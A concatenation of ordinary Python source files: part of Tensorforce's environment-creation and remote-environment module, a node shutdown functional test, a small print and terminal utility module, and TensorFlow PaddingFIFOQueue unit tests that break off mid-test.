runs environment in server communication loop until closed
(<span style="color:#00C000"><b>default</b></span>: local execution).
blocking (bool): Whether remote environment calls should be blocking
(<span style="color:#00C000"><b>default</b></span>: not blocking, invalid unless
"multiprocessing" or "socket-client" remote mode).
host (str): Socket server hostname or IP address
(<span style="color:#C00000"><b>required</b></span> only for "socket-client" remote
mode).
port (int): Socket server port
(<span style="color:#C00000"><b>required</b></span> only for "socket-client/server"
remote mode).
kwargs: Additional arguments.
"""
if remote not in ('multiprocessing', 'socket-client'):
if blocking:
raise TensorforceError.invalid(
name='Environment.create', argument='blocking',
condition='no multiprocessing/socket-client instance'
)
if remote not in ('socket-client', 'socket-server'):
if host is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='host', condition='no socket instance'
)
elif port is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='port', condition='no socket instance'
)
if remote == 'multiprocessing':
from tensorforce.environments import MultiprocessingEnvironment
environment = MultiprocessingEnvironment(
blocking=blocking, environment=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
return environment
elif remote == 'socket-client':
if environment is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='environment',
condition='socket-client instance'
)
elif max_episode_timesteps is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='max_episode_timesteps',
condition='socket-client instance'
)
elif len(kwargs) > 0:
raise TensorforceError.invalid(
name='Environment.create', argument='kwargs',
condition='socket-client instance'
)
from tensorforce.environments import SocketEnvironment
environment = SocketEnvironment(host=host, port=port, blocking=blocking)
return environment
elif remote == 'socket-server':
from tensorforce.environments import SocketEnvironment
SocketEnvironment.remote(
port=port, environment=environment, max_episode_timesteps=max_episode_timesteps,
**kwargs
)
elif isinstance(environment, (EnvironmentWrapper, RemoteEnvironment)):
if max_episode_timesteps is not None:
raise TensorforceError.invalid(
name='Environment.create', argument='max_episode_timesteps',
condition='EnvironmentWrapper instance'
)
if len(kwargs) > 0:
raise TensorforceError.invalid(
name='Environment.create', argument='kwargs',
condition='EnvironmentWrapper instance'
)
return environment
elif isinstance(environment, type) and \
issubclass(environment, (EnvironmentWrapper, RemoteEnvironment)):
raise TensorforceError.type(
name='Environment.create', argument='environment', dtype=type(environment)
)
elif isinstance(environment, Environment):
return EnvironmentWrapper(
environment=environment, max_episode_timesteps=max_episode_timesteps
)
elif isinstance(environment, type) and issubclass(environment, Environment):
environment = environment(**kwargs)
assert isinstance(environment, Environment)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps
)
elif isinstance(environment, dict):
# Dictionary specification
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
if max_episode_timesteps is None:
max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif isinstance(environment, str):
if os.path.isfile(environment):
# JSON file specification
with open(environment, 'r') as fp:
environment = json.load(fp=fp)
util.deep_disjoint_update(target=kwargs, source=environment)
environment = kwargs.pop('environment', kwargs.pop('type', 'default'))
assert environment is not None
if max_episode_timesteps is None:
max_episode_timesteps = kwargs.pop('max_episode_timesteps', None)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif '.' in environment:
# Library specification
library_name, module_name = environment.rsplit('.', 1)
library = importlib.import_module(name=library_name)
environment = getattr(library, module_name)
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
elif environment in tensorforce.environments.environments:
# Keyword specification
environment = tensorforce.environments.environments[environment]
return Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
# Default: OpenAI Gym
try:
return Environment.create(
environment='gym', level=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
except TensorforceError:
raise TensorforceError.value(
name='Environment.create', argument='environment', value=environment
)
else:
# Default: OpenAI Gym
from gym import Env
if isinstance(environment, Env) or \
(isinstance(environment, type) and issubclass(environment, Env)):
return Environment.create(
environment='gym', level=environment,
max_episode_timesteps=max_episode_timesteps, **kwargs
)
else:
raise TensorforceError.type(
name='Environment.create', argument='environment', dtype=type(environment)
)
def __init__(self):
# first two arguments, if applicable: level, visualize=False
util.overwrite_staticmethod(obj=self, function='create')
self._expect_receive = None
self._actions = None
def __str__(self):
return self.__class__.__name__
def states(self):
"""
Returns the state space specification.
Returns:
specification: Arbitrarily nested dictionary of state descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – state data type
(<span style="color:#00C000"><b>default</b></span>: "float").</li>
<li><b>shape</b> (<i>int | iter[int]</i>) – state shape
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>num_states</b> (<i>int > 0</i>) – number of discrete state values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum state value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def actions(self):
"""
Returns the action space specification.
Returns:
specification: Arbitrarily nested dictionary of action descriptions with the following
attributes:
<ul>
<li><b>type</b> (<i>"bool" | "int" | "float"</i>) – action data type
(<span style="color:#C00000"><b>required</b></span>).</li>
<li><b>shape</b> (<i>int > 0 | iter[int > 0]</i>) – action shape
(<span style="color:#00C000"><b>default</b></span>: scalar).</li>
<li><b>num_actions</b> (<i>int > 0</i>) – number of discrete action values
(<span style="color:#C00000"><b>required</b></span> for type "int").</li>
<li><b>min_value/max_value</b> (<i>float</i>) – minimum/maximum action value
(<span style="color:#00C000"><b>optional</b></span> for type "float").</li>
</ul>
"""
raise NotImplementedError
def max_episode_timesteps(self):
"""
Returns the maximum number of timesteps per episode.
Returns:
int: Maximum number of timesteps per episode.
"""
return None
def close(self):
"""
Closes the environment.
"""
pass
def reset(self):
"""
Resets the environment to start a new episode.
Returns:
dict[state]: Dictionary containing initial state(s) and auxiliary information.
"""
raise NotImplementedError
def execute(self, actions):
"""
Executes the given action(s) and advances the environment by one step.
Args:
actions (dict[action]): Dictionary containing action(s) to be executed
(<span style="color:#C00000"><b>required</b></span>).
Returns:
dict[state], bool | 0 | 1 | 2, float: Dictionary containing next state(s), whether
a terminal state is reached or 2 if the episode was aborted, and observed reward.
"""
raise NotImplementedError
def start_reset(self):
if self._expect_receive is not None:
raise TensorforceError.unexpected()
self._expect_receive = 'reset'
def start_execute(self, actions):
if self._expect_receive is not None:
raise TensorforceError.unexpected()
self._expect_receive = 'execute'
assert self._actions is None
self._actions = actions
def receive_execute(self):
if self._expect_receive == 'reset':
self._expect_receive = None
return self.reset(), -1, None
elif self._expect_receive == 'execute':
self._expect_receive = None
assert self._actions is not None
states, terminal, reward = self.execute(actions=self._actions)
self._actions = None
return states, int(terminal), reward
else:
raise TensorforceError.unexpected()
class EnvironmentWrapper(Environment):
def __init__(self, environment, max_episode_timesteps):
super().__init__()
if isinstance(environment, EnvironmentWrapper):
raise TensorforceError.unexpected()
if environment.max_episode_timesteps() is not None and \
max_episode_timesteps is not None and \
environment.max_episode_timesteps() < max_episode_timesteps:
raise TensorforceError.unexpected()
self._environment = environment
if max_episode_timesteps is None:
self._max_episode_timesteps = self._environment.max_episode_timesteps()
else:
self._max_episode_timesteps = max_episode_timesteps
if self._environment.max_episode_timesteps() is None:
self._environment.max_episode_timesteps = (lambda: max_episode_timesteps)
self._timestep = None
def __str__(self):
return str(self._environment)
def states(self):
return self._environment.states()
def actions(self):
return self._environment.actions()
def max_episode_timesteps(self):
return self._max_episode_timesteps
def close(self):
return self._environment.close()
def reset(self):
self._timestep = 0
states = self._environment.reset()
if isinstance(states, dict):
states = states.copy()
return states
def execute(self, actions):
if self._timestep is None:
raise TensorforceError(
message="An environment episode has to be initialized by calling reset() first."
)
assert self._max_episode_timesteps is None or self._timestep < self._max_episode_timesteps
states, terminal, reward = self._environment.execute(actions=actions)
if isinstance(states, dict):
states = states.copy()
terminal = int(terminal)
self._timestep += 1
if terminal == 0 and self._max_episode_timesteps is not None and \
self._timestep >= self._max_episode_timesteps:
terminal = 2
if terminal > 0:
self._timestep = None
return states, terminal, reward
_ATTRIBUTES = frozenset([
'_actions', 'create', '_environment', '_expect_receive', '_max_episode_timesteps',
'_timestep'
])
def __getattr__(self, name):
if name in EnvironmentWrapper._ATTRIBUTES:
return super().__getattr__(name)
else:
return getattr(self._environment, name)
def __setattr__(self, name, value):
if name in EnvironmentWrapper._ATTRIBUTES:
super().__setattr__(name, value)
else:
return setattr(self._environment, name, value)
class RemoteEnvironment(Environment):
@classmethod
def proxy_send(cls, connection, function, **kwargs):
raise NotImplementedError
@classmethod
def proxy_receive(cls, connection):
raise NotImplementedError
@classmethod
def proxy_close(cls, connection):
raise NotImplementedError
@classmethod
def remote_send(cls, connection, success, result):
raise NotImplementedError
@classmethod
def remote_receive(cls, connection):
raise NotImplementedError
@classmethod
def remote_close(cls, connection):
raise NotImplementedError
@classmethod
def remote(cls, connection, environment, max_episode_timesteps=None, **kwargs):
try:
env = None
env = Environment.create(
environment=environment, max_episode_timesteps=max_episode_timesteps, **kwargs
)
while True:
attribute, kwargs = cls.remote_receive(connection=connection)
if attribute in ('reset', 'execute'):
environment_start = time.time()
try:
result = getattr(env, attribute)
if callable(result):
if kwargs is None:
result = None
else:
result = result(**kwargs)
elif kwargs is None:
pass
elif len(kwargs) == 1 and 'value' in kwargs:
setattr(env, attribute, kwargs['value'])
result = None
else:
raise TensorforceError(message="Invalid remote attribute/function access.")
except AttributeError:
if kwargs is None or len(kwargs) != 1 or 'value' not in kwargs:
raise TensorforceError(message="Invalid remote attribute/function access.")
setattr(env, attribute, kwargs['value'])
result = None
if attribute in ('reset', 'execute'):
seconds = time.time() - environment_start
if attribute == 'reset':
result = (result, seconds)
else:
result += (seconds,)
cls.remote_send(connection=connection, success=True, result=result)
if attribute == 'close':
break
except BaseException:
etype, value, traceback = sys.exc_info()
cls.remote_send(
connection=connection, success=False,
result=(str(etype), str(value), format_tb(traceback))
)
try:
if env is not None:
env.close()
except BaseException:
pass
finally:
etype, value, traceback = sys.exc_info()
cls.remote_send(
connection=connection, success=False,
result=(str(etype), str(value), format_tb(traceback))
)
finally:
cls.remote_close(connection=connection)
def __init__(self, connection, blocking=False):
super().__init__()
self._connection = connection
self._blocking = blocking
self._observation = None
self._thread = None
self._episode_seconds = None
def send(self, function, kwargs):
if self._expect_receive is not None:
assert function != 'close'
self.close()
raise TensorforceError.unexpected()
self._expect_receive = function
try:
self.__class__.proxy_send(connection=self._connection, function=function, kwargs=kwargs)
except BaseException:
self.__class__.proxy_close(connection=self._connection)
raise
def receive(self, function):
if self._expect_receive != function:
assert function != 'close'
self.close()
raise TensorforceError.unexpected()
self._expect_receive = None
try:
success, result = self.__class__.proxy_receive(connection=self._connection)
except BaseException:
self.__class__.proxy_close(connection=self._connection)
raise
if success:
return result
else:
self.__class__.proxy_close(connection=self._connection)
etype, value, traceback = result
raise TensorforceError(message='\n{}\n{}: {}`'.format(''.join(traceback), etype, value))
_ATTRIBUTES = frozenset([
'_actions', '_blocking', '_connection', 'create', '_episode_seconds', '_expect_receive',
'_observation', '_thread'
])
def __getattr__(self, name):
if name in RemoteEnvironment._ATTRIBUTES:
return super().__getattr__(name)
else:
self.send(function=name, kwargs=None)
result = self.receive(function=name)
if result is None:
def proxy_function(*args, **kwargs):
if len(args) > 0:
raise TensorforceError(
message="Remote environment function call requires keyword arguments."
)
self.send(function=name, kwargs=kwargs)
return self.receive(function=name)
return proxy_function
else:
return result
def __setattr__(self, name, value):
if name in RemoteEnvironment._ATTRIBUTES:
super().__setattr__(name, value)
else:
self.send(function=name, kwargs=dict(value=value))
result = self.receive(function=name)
assert result is None
def __str__(self):
self.send(function='__str__', kwargs=dict())
return self.receive(function='__str__')
def states(self):
self.send(function='states', kwargs=dict())
return self.receive(function='states')
def actions(self):
self.send(function='actions', kwargs=dict())
return self.receive(function='actions')
def max_episode_timesteps(self):
self.send(function='max_episode_timesteps', kwargs=dict())
return self.receive(function='max_episode_timesteps')
def close(self):
if self._thread is not None:
self._thread.join()
if self._expect_receive is not None:
self.receive(function=self._expect_receive)
self.send(function='close', kwargs=dict())
self.receive(function='close')
self.__class__.proxy_close(connection=self._connection)
self._connection = None
self._observation = None
self._thread = None
def reset(self):
self._episode_seconds = 0.0
self.send(function='reset', kwargs=dict())
states, seconds = self.receive(function='reset')
self._episode_seconds += seconds
return states
def execute(self, actions):
self.send(function='execute', kwargs=dict(actions=actions))
states, terminal, reward, seconds = self.receive(function='execute')
self._episode_seconds += seconds
return states, int(terminal), reward
def start_reset(self):
self._episode_seconds = 0.0
if self._blocking:
self.send(function='reset', kwargs=dict())
else:
if self._thread is not None: # TODO: not expected
self._thread.join()
self._observation = None
self._thread = Thread(target=self.finish_reset)
self._thread.start()
def finish_reset(self):
assert self._thread is not None and self._observation is None
self._observation = (self.reset(), -1, None)
self._thread = None
def start_execute(self, actions):
if self._blocking:
self.send(function='execute', kwargs=dict(actions=actions))
else:
assert self._thread is None and self._observation is None
self._thread = Thread(target=self.finish_execute, kwargs=dict(actions=actions))
self._thread.start()
def finish_execute(self, actions):
assert self._thread is not None and self._observation is None
self._observation = self.execute(actions=actions)
self._thread = None
def receive_execute(self):
if self._blocking:
if self._expect_receive == 'reset':
states, seconds = self.receive(function='reset')
self._episode_seconds += seconds
return states, -1, None
else:
states, terminal, reward, seconds = self.receive(function='execute')
self._episode_seconds += seconds
return states, int(terminal), reward
else:
if self._thread is not None:
return None
else:
assert self._observation is not None
observation = self._observation
self._observation = None
return observation
|
feature_shutdown.py | #!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test carpinchod shutdown."""
from test_framework.test_framework import CARPINCHOTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(CARPINCHOTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
util.py | from __future__ import print_function # For * **
import sys
import os
def runsep(method, args): # Run and retrieve process's stdout
def queue_wrapper(q, params):
r = method(*params)
q.put(r)
q = Queue()
p = Process(target=queue_wrapper, args=(q, args))
p.start()
return_val = q.get()
p.join()
return return_val
## Functions
def exit(ec=0):
sys.exit(ec)
def pf(*x, **y): # Print-flush
print(*x, **y)
sys.stdout.flush()
def pfp(*x, **y): # Print-flush, plain (no separator)
y.setdefault('sep', '')
print(*x, **y)
sys.stdout.flush()
def pfl(*x, **y): # Print-flush, line (ie. no newline)
y.setdefault('end', '')
print(*x, **y)
sys.stdout.flush()
def pfpl(*x, **y): # Print-flush, plain, line (no sep, no NL)
y.setdefault('sep', '')
y.setdefault('end', '')
print(*x, **y)
sys.stdout.flush()
def eprint(*args, **kwargs): # Print to stderr
print(*args, file=sys.stderr, **kwargs)
def vprint(verbosity, *args, **kwargs):
if (verbose >= verbosity):
pf(*args, **kwargs)
def setverbosity(v=0):
global verbose
verbose=v
def get_linux_terminal():
env = os.environ
def ioctl_GWINSZ(fd):
try:
import fcntl, termios, struct, os
cr = struct.unpack('hh', fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
except:
return
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (env.get('LINES', 25), env.get('COLUMNS', 80))
### Use get(key[, default]) instead of a try/catch
#try:
# cr = (env['LINES'], env['COLUMNS'])
#except:
# cr = (25, 80)
return int(cr[1]), int(cr[0])
def get_filelen(fn):
fstat = os.stat(fn)
flen = fstat.st_size
return flen
# vim:ts=4 ai
|
padding_fifo_queue_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.platform import test
class PaddingFIFOQueueTest(test.TestCase):
def testConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32), ((), ()),
shared_name="foo",
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with ops.Graph().as_default():
q = data_flow_ops.PaddingFIFOQueue(
5, (dtypes_lib.int32, dtypes_lib.float32),
shapes=(tensor_shape.TensorShape([1, 1, 2, 3]),
tensor_shape.TensorShape([5, 8])),
name="Q")
self.assertTrue(isinstance(q.queue_ref, ops.Tensor))
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueueV2'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, [dtypes_lib.int32, dtypes_lib.int32], shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [
self.checkedThread(
target=enqueue, args=(e,)) for e in enqueue_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(3, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.int32, dtypes_lib.float32),
((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, self.evaluate(size))
dequeued_t.op.run()
self.assertEqual(0, self.evaluate(size))
def testEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = self.evaluate(dequeued_t)
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, (
(None, None),))
empty_t = constant_op.constant(
[], dtype=dtypes_lib.float32, shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], self.evaluate(size_t))
enqueue_op.run()
self.assertEqual([0], self.evaluate(size_t))
def testEmptyDequeueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testEmptyDequeueUpToWithDynamicShape(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(
10, dtypes_lib.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_up_to(0)
self.assertEqual([], self.evaluate(dequeued_t).tolist())
enqueue_op.run()
self.assertEqual([], self.evaluate(dequeued_t).tolist())
def testConstructPaddingFIFOQueueWithNoShape(self):
with self.cached_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32,
None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(10,
(dtypes_lib.float32, dtypes_lib.int32),
((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testDequeueUpToNoBlocking(self):
with self.cached_session():
q = data_flow_ops.PaddingFIFOQueue(10, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_up_to(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], self.evaluate(dequeued_t))
self.assertAllEqual(elems[4:8], self.evaluate(dequeued_t))
def testMultiDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
[15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.cached_session() as sess:
q = data_flow_ops.PaddingFIFOQueue(
10, (dtypes_lib.float32, dtypes_lib.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0
]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14],
